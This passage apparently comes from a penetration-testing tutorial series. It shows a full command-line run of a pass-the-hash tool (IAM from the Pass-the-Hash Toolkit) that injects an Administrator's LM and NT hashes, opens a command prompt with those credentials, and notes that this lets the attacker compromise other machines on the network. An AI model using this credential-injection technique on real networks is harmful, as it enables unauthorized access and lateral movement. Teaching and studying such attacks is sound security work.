C:\pshtoolkit_v1.4\iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
IAM v1.4 - by Hernan Ochoa - (c) 2007-2008 Core Security Technologies
Parameters:
Username: Administrator
Domainname: SERVER2
LM hash: 209CA2D6E74286E9AAD3B435B51404EE
NT hash: BA69764BCCF8F41121E0B3046CE46C67
Run: cmd.exe
LSASRV.DLL version: 00050001h. A280DC0h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 75753BA0, EM = 7573FDEC)
The current logon credentials were successful changed!

Now the new command prompt runs with SERVER2’s Administrator credentials, which should let us compromise a number of machines in the network.


When you are ready, please continue reading The Art of the Unix / Linux Attack (Part Two).